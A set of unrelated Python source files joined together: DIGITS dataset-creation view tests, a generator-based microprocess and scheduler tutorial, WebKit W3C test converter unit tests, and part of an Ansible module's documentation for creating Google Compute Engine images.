def test_page_dataset_new(self):
rv = self.app.get('/datasets/images/classification/new')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'New Image Classification Dataset' in rv.data, 'unexpected page format'
def test_nonexistent_dataset(self):
assert not self.dataset_exists('foo'), "dataset shouldn't exist"
class TestCreation(BaseViewsTestWithImageset, test_utils.DatasetMixin):
"""
Dataset creation tests
"""
def test_nonexistent_folder(self):
try:
self.create_dataset(
folder_train='/not-a-directory'
)
except RuntimeError:
return
raise AssertionError('Should have failed')
def test_create_json(self):
job_id = self.create_dataset(json=True)
self.abort_dataset(job_id)
def test_create_delete(self):
job_id = self.create_dataset()
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_create_abort_delete(self):
job_id = self.create_dataset()
assert self.abort_dataset(job_id) == 200, 'abort failed'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_create_wait_delete(self):
job_id = self.create_dataset()
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
def test_textfiles(self):
for absolute_path in (True, False):
for local_path in (True, False):
yield self.check_textfiles, absolute_path, local_path
def check_textfiles(self, absolute_path=True, local_path=True):
"""
Create a dataset from textfiles
Arguments:
        absolute_path -- if False, give relative paths and image folders
        local_path -- if True, write the text files to the local filesystem
            instead of uploading them as POST data
        """
textfile_train_images = ''
textfile_labels_file = ''
label_id = 0
for label, images in self.imageset_paths.iteritems():
textfile_labels_file += '%s\n' % label
for image in images:
image_path = image
if absolute_path:
image_path = os.path.join(self.imageset_folder, image_path)
textfile_train_images += '%s %d\n' % (image_path, label_id)
label_id += 1
data = {
'method': 'textfile',
'textfile_use_val': 'y',
}
if local_path:
train_file = os.path.join(self.imageset_folder, "local_train.txt")
labels_file = os.path.join(self.imageset_folder, "local_labels.txt")
# create files in local filesystem - these will be removed in tearDownClass() function
with open(train_file, "w") as outfile:
outfile.write(textfile_train_images)
with open(labels_file, "w") as outfile:
outfile.write(textfile_labels_file)
data['textfile_use_local_files'] = 'True'
data['textfile_local_train_images'] = train_file
# Use the same file for training and validation.
data['textfile_local_val_images'] = train_file
data['textfile_local_labels_file'] = labels_file
else:
# StringIO wrapping is needed to simulate POST file upload.
train_upload = (StringIO(textfile_train_images), "train.txt")
# Use the same list for training and validation.
val_upload = (StringIO(textfile_train_images), "val.txt")
labels_upload = (StringIO(textfile_labels_file), "labels.txt")
data['textfile_train_images'] = train_upload
data['textfile_val_images'] = val_upload
data['textfile_labels_file'] = labels_upload
if not absolute_path:
data['textfile_train_folder'] = self.imageset_folder
data['textfile_val_folder'] = self.imageset_folder
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
def test_abort_explore_fail(self):
job_id = self.create_dataset()
self.abort_dataset(job_id)
rv = self.app.get('/datasets/images/classification/explore?job_id=%s&db=val' % job_id)
assert rv.status_code == 500, 'page load should have failed'
assert 'status should be' in rv.data, 'unexpected page format'
class TestImageCount(BaseViewsTestWithImageset, test_utils.DatasetMixin):
def test_image_count(self):
for type in ['train', 'val', 'test']:
yield self.check_image_count, type
def check_image_count(self, type):
data = {'folder_pct_val': 20,
'folder_pct_test': 10}
if type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
image_count = parse_info['train_count'] + parse_info['val_count'] + parse_info['test_count']
assert parse_info['val_count'] == 0.2 * image_count
assert parse_info['test_count'] == 0.1 * image_count
else:
            assert len(info['ParseFolderTasks']) == 2, 'expected exactly two ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
if type == 'val':
assert parse_info['train_count'] == 0
assert parse_info['test_count'] == 0
image_count = parse_info['val_count']
else:
assert parse_info['train_count'] == 0
assert parse_info['val_count'] == 0
image_count = parse_info['test_count']
assert self.categoryCount() == parse_info['label_count']
assert image_count == self.IMAGE_COUNT * parse_info['label_count'], 'image count mismatch'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestMaxPerClass(BaseViewsTestWithImageset, test_utils.DatasetMixin):
def test_max_per_class(self):
for type in ['train', 'val', 'test']:
yield self.check_max_per_class, type
def check_max_per_class(self, type):
# create dataset, asking for at most IMAGE_COUNT/2 images per class
assert self.IMAGE_COUNT % 2 == 0
max_per_class = self.IMAGE_COUNT / 2
data = {'folder_pct_val': 0}
if type == 'train':
data['folder_train_max_per_class'] = max_per_class
        elif type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
data['folder_val_max_per_class'] = max_per_class
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
data['folder_test_max_per_class'] = max_per_class
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
else:
            assert len(info['ParseFolderTasks']) == 2, 'expected exactly two ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
image_count = parse_info['train_count'] + parse_info['val_count'] + parse_info['test_count']
assert image_count == max_per_class * parse_info['label_count'], 'image count mismatch'
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestMinPerClass(BaseViewsTestWithImageset, test_utils.DatasetMixin):
UNBALANCED_CATEGORY = True
def test_min_per_class(self):
for type in ['train', 'val', 'test']:
yield self.check_min_per_class, type
def check_min_per_class(self, type):
# create dataset, asking for one more image per class
# than available in the "unbalanced" category
min_per_class = self.IMAGE_COUNT / 2 + 1
data = {'folder_pct_val': 0}
if type == 'train':
data['folder_train_min_per_class'] = min_per_class
        elif type == 'val':
data['has_val_folder'] = 'True'
data['folder_val'] = self.imageset_folder
data['folder_val_min_per_class'] = min_per_class
elif type == 'test':
data['has_test_folder'] = 'True'
data['folder_test'] = self.imageset_folder
data['folder_test_min_per_class'] = min_per_class
job_id = self.create_dataset(**data)
assert self.dataset_wait_completion(job_id) == 'Done', 'create failed'
info = self.dataset_info(job_id)
if type == 'train':
assert len(info['ParseFolderTasks']) == 1, 'expected exactly one ParseFolderTasks'
parse_info = info['ParseFolderTasks'][0]
else:
assert len(info['ParseFolderTasks']) == 2, 'expected exactly two ParseFolderTasks'
parse_info = info['ParseFolderTasks'][1]
assert self.categoryCount() == parse_info['label_count'] + 1
assert self.delete_dataset(job_id) == 200, 'delete failed'
assert not self.dataset_exists(job_id), 'dataset exists after delete'
class TestCreated(BaseViewsTestWithDataset, test_utils.DatasetMixin):
"""
Tests on a dataset that has already been created
"""
def test_index_json(self):
rv = self.app.get('/index.json')
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
found = False
for d in content['datasets']:
if d['id'] == self.dataset_id:
found = True
break
assert found, 'dataset not found in list'
def test_dataset_json(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
content = json.loads(rv.data)
assert content['id'] == self.dataset_id, 'expected different job_id'
def test_mean_dimensions(self):
img_url = '/files/%s/mean.jpg' % self.dataset_id
rv = self.app.get(img_url)
assert rv.status_code == 200, 'GET on %s returned %s' % (img_url, rv.status_code)
buff = StringIO(rv.data)
buff.seek(0)
pil_image = PIL.Image.open(buff)
assert pil_image.size == (self.IMAGE_WIDTH, self.IMAGE_HEIGHT), 'image size is %s' % (pil_image.size,)
def test_edit_name(self):
status = self.edit_job(self.dataset_id,
name='new name'
)
assert status == 200, 'failed with %s' % status
rv = self.app.get('/datasets/summary?job_id=%s' % self.dataset_id)
assert rv.status_code == 200
assert 'new name' in rv.data
def test_edit_notes(self):
status = self.edit_job(
self.dataset_id,
notes='new notes'
)
assert status == 200, 'failed with %s' % status
def test_backend_selection(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
content = json.loads(rv.data)
for task in content['CreateDbTasks']:
assert task['backend'] == self.BACKEND
def test_explore_train(self):
rv = self.app.get('/datasets/images/classification/explore?job_id=%s&db=train' % self.dataset_id)
if self.BACKEND == 'hdf5':
# Not supported yet
assert rv.status_code == 500, 'page load should have failed'
assert 'expected backend is lmdb' in rv.data, 'unexpected page format'
else:
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'Items per page' in rv.data, 'unexpected page format'
def test_explore_val(self):
rv = self.app.get('/datasets/images/classification/explore?job_id=%s&db=val' % self.dataset_id)
if self.BACKEND == 'hdf5':
# Not supported yet
assert rv.status_code == 500, 'page load should have failed'
assert 'expected backend is lmdb' in rv.data, 'unexpected page format'
else:
assert rv.status_code == 200, 'page load failed with %s' % rv.status_code
assert 'Items per page' in rv.data, 'unexpected page format'
class TestCreatedGrayscale(TestCreated, test_utils.DatasetMixin):
IMAGE_CHANNELS = 1
class TestCreatedWide(TestCreated, test_utils.DatasetMixin):
IMAGE_WIDTH = 20
class TestCreatedTall(TestCreated, test_utils.DatasetMixin):
IMAGE_HEIGHT = 20
class TestCreatedJPEG(TestCreated, test_utils.DatasetMixin):
ENCODING = 'jpg'
class TestCreatedRaw(TestCreated, test_utils.DatasetMixin):
ENCODING = 'none'
class TestCreatedRawGrayscale(TestCreated, test_utils.DatasetMixin):
ENCODING = 'none'
IMAGE_CHANNELS = 1
class TestCreatedHdf5(TestCreated, test_utils.DatasetMixin):
BACKEND = 'hdf5'
def test_compression_method(self):
rv = self.app.get('/datasets/%s.json' % self.dataset_id)
content = json.loads(rv.data)
for task in content['CreateDbTasks']:
assert task['compression'] == self.COMPRESSION
class TestCreatedHdf5Gzip(TestCreatedHdf5, test_utils.DatasetMixin):
COMPRESSION = 'gzip'
|
|
#/--------------------------------------------------------------------------------------------------
#
# Pretty standard fibonacci function
#
#
def fibonacci():
a,b = 1,1
while 1:
print a
a,b = b, a+b
fibonacci()
#
#
#
#
#
#
#
#
#
#
#
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Generator form
#
#
def fibonacci():
a,b = 1,1
while 1:
yield a # was print a
a,b = b, a+b
g = fibonacci()
print g
print g.next()
print g.next()
print g.next()
#
#
#
#
#
#
#
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Put the generator into a class
#
class microprocess(object):
def __init__(self):
super(microprocess, self).__init__()
    def main(self): # <--- Look, it's here!!!
yield 1
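#
# A quick sketch (not part of the original walkthrough): calling main() does
# not run the body, it hands back a generator that we can step through by hand.
#
m = microprocess()
g = m.main()
print g.next() # -> 1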
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Create something to call the generator and manage run queues
#
class scheduler(microprocess):
def __init__(self):
super(scheduler, self).__init__()
self.active = []
self.newqueue = []
def main(self):
for i in xrange(100):
for current in self.active:
yield 1
try:
result = current.next()
                    if result != -1:
self.newqueue.append(current)
except StopIteration:
pass
self.active = self.newqueue
self.newqueue = []
def activateMicroprocess(self, someprocess):
microthread = someprocess.main()
self.newqueue.append(microthread)
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Example microprocess, usage and running
#
class printer(microprocess):
def __init__(self, tag):
super(printer, self).__init__()
self.tag = tag
def main(self):
while 1:
yield 1 # Must be a generator
print self.tag
X = printer("Hello World")
Y = printer("Game Over") # Another well known 2 word phrase :-)
myscheduler = scheduler()
myscheduler.activateMicroprocess(X)
myscheduler.activateMicroprocess(Y)
for _ in myscheduler.main():
pass
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Basic Component
#
class component(microprocess):
Boxes = {
"inbox" : "This is where we expect to receive messages",
"outbox" : "This is where we send results/messages"
}
def __init__(self):
super(component, self).__init__()
self.boxes = {}
for box in self.Boxes:
self.boxes[box] = list()
def send(self, value, outboxname):
self.boxes[outboxname].append(value)
def recv(self, inboxname):
result = self.boxes[inboxname][0]
del self.boxes[inboxname][0]
return result
def dataReady(self, inboxname):
return len(self.boxes[inboxname])
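#
# A quick sketch (not part of the original walkthrough) of the mailbox API:
# messages queue up in a named box until someone collects them.
#
c = component()
c.send("hello", "outbox")
print c.dataReady("outbox") # -> 1
print c.recv("outbox") # -> hello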
#
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Someone to ensure deliveries
#
class postman(microprocess):
def __init__(self, source, sourcebox, sink, sinkbox):
self.source = source
self.sourcebox = sourcebox
self.sink = sink
self.sinkbox = sinkbox
def main(self):
while 1:
yield 1
if self.source.dataReady(self.sourcebox):
d = self.source.recv(self.sourcebox)
self.sink.send(d, self.sinkbox)
#
#
#
#
#
#
#
#
#\--------------------------------------------------------------------------------------------------
#/--------------------------------------------------------------------------------------------------
#
# Simple Producer/Consumer components & example usage
#
class Producer(component):
def __init__(self, message):
super(Producer, self).__init__()
self.message = message
def main(self):
while 1:
yield 1
self.send(self.message, "outbox")
class Consumer(component):
def main(self):
count = 0
while 1:
yield 1
count += 1 # This is to show our data is changing :-)
if self.dataReady("inbox"):
data = self.recv("inbox")
print data, count
p = Producer("Hello World")
c = Consumer()
postie = postman(p, "outbox", c, "inbox")
myscheduler = scheduler()
myscheduler.activateMicroprocess(p)
myscheduler.activateMicroprocess(c)
myscheduler.activateMicroprocess(postie)
for _ in myscheduler.main():
pass
#
#
#\--------------------------------------------------------------------------------------------------
|
|
#!/usr/bin/env python
# Copyright (C) 2013 Adobe Systems Incorporated. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER "AS IS" AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
# THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
import os
import re
import unittest2 as unittest
from webkitpy.common.system.outputcapture import OutputCapture
from webkitpy.thirdparty.BeautifulSoup import BeautifulSoup
from webkitpy.w3c.test_converter import W3CTestConverter
DUMMY_FILENAME = 'dummy.html'
class W3CTestConverterTest(unittest.TestCase):
def fake_dir_path(self, converter, dirname):
return converter.path_from_webkit_root("LayoutTests", "css", dirname)
def test_read_prefixed_property_list(self):
""" Tests that the current list of properties requiring the -webkit- prefix load correctly """
# FIXME: We should be passing in a MockHost here ...
converter = W3CTestConverter()
prop_list = converter.prefixed_properties
self.assertTrue(prop_list, 'No prefixed properties found')
for prop in prop_list:
self.assertTrue(prop.startswith('-webkit-'))
def test_convert_for_webkit_nothing_to_convert(self):
""" Tests convert_for_webkit() using a basic test that has nothing to convert """
test_html = """<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CSS Test: DESCRIPTION OF TEST</title>
<link rel="author" title="NAME_OF_AUTHOR"
href="mailto:EMAIL OR http://CONTACT_PAGE"/>
<link rel="help" href="RELEVANT_SPEC_SECTION"/>
<meta name="assert" content="TEST ASSERTION"/>
<style type="text/css"><![CDATA[
CSS FOR TEST
]]></style>
</head>
<body>
CONTENT OF TEST
</body>
</html>
"""
converter = W3CTestConverter()
oc = OutputCapture()
oc.capture_output()
try:
converted = converter.convert_html('/nothing/to/convert', test_html, DUMMY_FILENAME)
finally:
oc.restore_output()
self.verify_no_conversion_happened(converted)
def test_convert_for_webkit_harness_only(self):
""" Tests convert_for_webkit() using a basic JS test that uses testharness.js only and has no prefixed properties """
test_html = """<head>
<link href="/resources/testharness.css" rel="stylesheet" type="text/css">
<script src="/resources/testharness.js"></script>
</head>
"""
converter = W3CTestConverter()
fake_dir_path = self.fake_dir_path(converter, "harnessonly")
converted = converter.convert_html(fake_dir_path, test_html, DUMMY_FILENAME)
self.verify_conversion_happened(converted)
self.verify_test_harness_paths(converter, converted[1], fake_dir_path, 1, 1)
self.verify_prefixed_properties(converted, [])
def test_convert_for_webkit_properties_only(self):
""" Tests convert_for_webkit() using a test that has 2 prefixed properties: 1 in a style block + 1 inline style """
test_html = """<html>
<head>
<link href="/resources/testharness.css" rel="stylesheet" type="text/css">
<script src="/resources/testharness.js"></script>
<style type="text/css">
#block1 { @test0@: propvalue; }
</style>
</head>
<body>
<div id="elem1" style="@test1@: propvalue;"></div>
</body>
</html>
"""
converter = W3CTestConverter()
fake_dir_path = self.fake_dir_path(converter, 'harnessandprops')
test_content = self.generate_test_content(converter.prefixed_properties, 1, test_html)
oc = OutputCapture()
oc.capture_output()
try:
converted = converter.convert_html(fake_dir_path, test_content[1], DUMMY_FILENAME)
finally:
oc.restore_output()
self.verify_conversion_happened(converted)
self.verify_test_harness_paths(converter, converted[1], fake_dir_path, 1, 1)
self.verify_prefixed_properties(converted, test_content[0])
def test_convert_for_webkit_harness_and_properties(self):
""" Tests convert_for_webkit() using a basic JS test that uses testharness.js and testharness.css and has 4 prefixed properties: 3 in a style block + 1 inline style """
test_html = """<html>
<head>
<link href="/resources/testharness.css" rel="stylesheet" type="text/css">
<script src="/resources/testharness.js"></script>
<style type="text/css">
#block1 { @test0@: propvalue; }
#block2 { @test1@: propvalue; }
#block3 { @test2@: propvalue; }
</style>
</head>
<body>
<div id="elem1" style="@test3@: propvalue;"></div>
</body>
</html>
"""
converter = W3CTestConverter()
fake_dir_path = self.fake_dir_path(converter, 'harnessandprops')
oc = OutputCapture()
oc.capture_output()
try:
test_content = self.generate_test_content(converter.prefixed_properties, 2, test_html)
converted = converter.convert_html(fake_dir_path, test_content[1], DUMMY_FILENAME)
finally:
oc.restore_output()
self.verify_conversion_happened(converted)
self.verify_test_harness_paths(converter, converted[1], fake_dir_path, 1, 1)
self.verify_prefixed_properties(converted, test_content[0])
def test_convert_test_harness_paths(self):
""" Tests convert_testharness_paths() with a test that uses all three testharness files """
test_html = """<head>
<link href="/resources/testharness.css" rel="stylesheet" type="text/css">
<script src="/resources/testharness.js"></script>
<script src="/resources/testharnessreport.js"></script>
</head>
"""
converter = W3CTestConverter()
fake_dir_path = self.fake_dir_path(converter, 'testharnesspaths')
doc = BeautifulSoup(test_html)
oc = OutputCapture()
oc.capture_output()
try:
converted = converter.convert_testharness_paths(doc, fake_dir_path, DUMMY_FILENAME)
finally:
oc.restore_output()
self.verify_conversion_happened(converted)
self.verify_test_harness_paths(converter, doc, fake_dir_path, 2, 1)
def test_convert_prefixed_properties(self):
""" Tests convert_prefixed_properties() file that has 20 properties requiring the -webkit- prefix:
10 in one style block + 5 in another style
block + 5 inline styles, including one with multiple prefixed properties.
The properties in the test content are in all sorts of wack formatting.
"""
test_html = """<html>
<style type="text/css"><![CDATA[
.block1 {
width: 300px;
height: 300px
}
.block2 {
@test0@: propvalue;
}
.block3{@test1@: propvalue;}
.block4 { @test2@:propvalue; }
.block5{ @test3@ :propvalue; }
#block6 { @test4@ : propvalue; }
#block7
{
@test5@: propvalue;
}
#block8 { @test6@: propvalue; }
#block9:pseudo
{
@test7@: propvalue;
@test8@: propvalue propvalue propvalue;;
}
]]></style>
</head>
<body>
<div id="elem1" style="@test9@: propvalue;"></div>
<div id="elem2" style="propname: propvalue; @test10@ : propvalue; propname:propvalue;"></div>
<div id="elem2" style="@test11@: propvalue; @test12@ : propvalue; @test13@ :propvalue;"></div>
<div id="elem3" style="@test14@:propvalue"></div>
</body>
<style type="text/css"><![CDATA[
.block10{ @test15@: propvalue; }
.block11{ @test16@: propvalue; }
.block12{ @test17@: propvalue; }
#block13:pseudo
{
@test18@: propvalue;
@test19@: propvalue;
}
]]></style>
</html>
"""
converter = W3CTestConverter()
test_content = self.generate_test_content(converter.prefixed_properties, 20, test_html)
oc = OutputCapture()
oc.capture_output()
try:
converted = converter.convert_prefixed_properties(BeautifulSoup(test_content[1]), DUMMY_FILENAME)
finally:
oc.restore_output()
self.verify_conversion_happened(converted)
self.verify_prefixed_properties(converted, test_content[0])
def verify_conversion_happened(self, converted):
self.assertTrue(converted, "conversion didn't happen")
def verify_no_conversion_happened(self, converted):
self.assertEqual(converted, None, 'test should not have been converted')
def verify_test_harness_paths(self, converter, converted, test_path, num_src_paths, num_href_paths):
if isinstance(converted, basestring):
converted = BeautifulSoup(converted)
resources_dir = converter.path_from_webkit_root("LayoutTests", "resources")
# Verify the original paths are gone, and the new paths are present.
orig_path_pattern = re.compile('\"/resources/testharness')
self.assertEquals(len(converted.findAll(src=orig_path_pattern)), 0, 'testharness src path was not converted')
self.assertEquals(len(converted.findAll(href=orig_path_pattern)), 0, 'testharness href path was not converted')
new_relpath = os.path.relpath(resources_dir, test_path)
relpath_pattern = re.compile(new_relpath)
self.assertEquals(len(converted.findAll(src=relpath_pattern)), num_src_paths, 'testharness src relative path not correct')
self.assertEquals(len(converted.findAll(href=relpath_pattern)), num_href_paths, 'testharness href relative path not correct')
def verify_prefixed_properties(self, converted, test_properties):
self.assertEqual(len(converted[0]), len(test_properties), 'Incorrect number of properties converted')
for test_prop in test_properties:
self.assertTrue((test_prop in converted[1]), 'Property ' + test_prop + ' not found in converted doc')
def generate_test_content(self, full_property_list, num_test_properties, html):
"""Inserts properties requiring a -webkit- prefix into the content, replacing \'@testXX@\' with a property."""
test_properties = []
count = 0
while count < num_test_properties:
test_properties.append(full_property_list[count])
count += 1
# Replace the tokens in the testhtml with the test properties. Walk backward
# through the list to replace the double-digit tokens first
index = len(test_properties) - 1
while index >= 0:
# Use the unprefixed version
test_prop = test_properties[index].replace('-webkit-', '')
# Replace the token
html = html.replace('@test' + str(index) + '@', test_prop)
index -= 1
return (test_properties, html)
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_image
description:
- Represents an Image resource.
- Google Compute Engine uses operating system images to create the root persistent
disks for your instances. You specify an image when you create an instance. Images
contain a boot loader, an operating system, and a root file system. Linux operating
system images are also capable of running containers on Compute Engine.
- Images can be either public or custom.
- Public images are provided and maintained by Google, open-source communities, and
third-party vendors. By default, all projects have access to these images and can
use them to create instances. Custom images are available only to your project.
You can create a custom image from root persistent disks and other images. Then,
use the custom image to create an instance.
short_description: Creates a GCP Image
version_added: '2.6'
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
type: str
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
required: false
type: str
disk_size_gb:
description:
- Size of the image when restored onto a persistent disk (in GB).
required: false
type: int
family:
description:
- The name of the image family to which this image belongs. You can create disks
by specifying an image family instead of a specific image name. The image family
always returns its latest image that is not deprecated. The name of the image
family must comply with RFC1035.
required: false
type: str
guest_os_features:
description:
- A list of features to enable on the guest operating system.
- Applicable only for bootable images.
required: false
type: list
suboptions:
type:
description:
- The type of supported feature.
- 'Some valid choices include: "MULTI_IP_SUBNET", "SECURE_BOOT", "UEFI_COMPATIBLE",
"VIRTIO_SCSI_MULTIQUEUE", "WINDOWS"'
required: false
type: str
image_encryption_key:
description:
- Encrypts the image using a customer-supplied encryption key.
    - After you encrypt an image with a customer-supplied key, you must provide the
      same key if you use the image later (e.g. to create a disk from the image).
required: false
type: dict
suboptions:
raw_key:
description:
- Specifies a 256-bit customer-supplied encryption key, encoded in RFC 4648
base64 to either encrypt or decrypt this resource.
required: false
type: str
labels:
description:
- Labels to apply to this Image.
required: false
type: dict
version_added: '2.8'
licenses:
description:
- Any applicable license URI.
required: false
type: list
name:
description:
- Name of the resource; provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
required: true
type: str
raw_disk:
description:
- The parameters of the raw disk image.
required: false
type: dict
suboptions:
container_type:
description:
- The format used to encode and transmit the block device, which should be
TAR. This is just a container and transmission format and not a runtime
format. Provided by the client when the disk image is created.
- 'Some valid choices include: "TAR"'
required: false
type: str
sha1_checksum:
description:
- An optional SHA1 checksum of the disk image before unpackaging.
- This is provided by the client when the disk image is created.
required: false
type: str
source:
description:
        - The full Google Cloud Storage URL where the disk image is stored. You must
          provide either this property or the sourceDisk property but not both.
required: true
type: str
source_disk:
description:
- The source disk to create this image based on.
- You must provide either this property or the rawDisk.source property but not
both to create an image.
- 'This field represents a link to a Disk resource in GCP. It can be specified
in two ways. First, you can place a dictionary with key ''selfLink'' and value
of your resource''s selfLink Alternatively, you can add `register: name-of-resource`
to a gcp_compute_disk task and then set this source_disk field to "{{ name-of-resource
}}"'
required: false
type: dict
source_disk_encryption_key:
description:
- The customer-supplied encryption key of the source disk. Required if the source
disk is protected by a customer-supplied encryption key.
required: false
type: dict
suboptions:
raw_key:
description:
- Specifies a 256-bit customer-supplied encryption key, encoded in RFC 4648
base64 to either encrypt or decrypt this resource.
required: false
type: str
source_disk_id:
description:
- The ID value of the disk used to create this image. This value may be used to
determine whether the image was taken from the current or a previous instance
of a given disk name.
required: false
type: str
source_type:
description:
- The type of the image used to create this disk. The default and only value is
      RAW.
- 'Some valid choices include: "RAW"'
required: false
type: str
project:
description:
- The Google Cloud Platform project to use.
type: str
auth_kind:
description:
- The type of credential used.
type: str
required: true
choices:
- application
- machineaccount
- serviceaccount
service_account_contents:
description:
- The contents of a Service Account JSON file, either in a dictionary or as a
JSON string that represents it.
type: jsonarg
service_account_file:
description:
- The path of a Service Account JSON file if serviceaccount is selected as type.
type: path
service_account_email:
description:
- An optional service account email address if machineaccount is selected and
the user does not wish to use the default email.
type: str
scopes:
description:
- Array of scopes to be used
type: list
env_type:
description:
- Specifies which Ansible environment you're running this module within.
- This should not be set unless you know what you're doing.
- This only alters the User Agent string for any API requests.
type: str
notes:
- 'API Reference: U(https://cloud.google.com/compute/docs/reference/v1/images)'
- 'Official Documentation: U(https://cloud.google.com/compute/docs/images)'
- For authentication, you can set service_account_file using the C(GCP_SERVICE_ACCOUNT_FILE)
  env variable.
- For authentication, you can set service_account_contents using the C(GCP_SERVICE_ACCOUNT_CONTENTS)
  env variable.
- For authentication, you can set service_account_email using the C(GCP_SERVICE_ACCOUNT_EMAIL)
env variable.
- For authentication, you can set auth_kind using the C(GCP_AUTH_KIND) env variable.
- For authentication, you can set scopes using the C(GCP_SCOPES) env variable.
- Environment variable values will only be used if the playbook values are not set.
- The I(service_account_email) and I(service_account_file) options are mutually exclusive.
'''
EXAMPLES = '''
- name: create a disk
gcp_compute_disk:
name: disk-image
zone: us-central1-a
project: "{{ gcp_project }}"
auth_kind: "{{ gcp_cred_kind }}"
service_account_file: "{{ gcp_cred_file }}"
state: present
register: disk
- name: create an image
gcp_compute_image:
name: test_object
source_disk: "{{ disk }}"
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
state: present
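# Illustrative follow-up (a sketch, not from the generated examples): the same
# image can be removed again by re-running the task with state: absent.
- name: delete the image
  gcp_compute_image:
    name: test_object
    project: test_project
    auth_kind: serviceaccount
    service_account_file: "/tmp/auth.pem"
    state: absent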
'''
RETURN = '''
archiveSizeBytes:
description:
- Size of the image tar.gz archive stored in Google Cloud Storage (in bytes).
returned: success
type: int
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
deprecated:
description:
- The deprecation status associated with this image.
returned: success
type: complex
contains:
deleted:
description:
- An optional RFC3339 timestamp on or after which the state of this resource
is intended to change to DELETED. This is only informational and the status
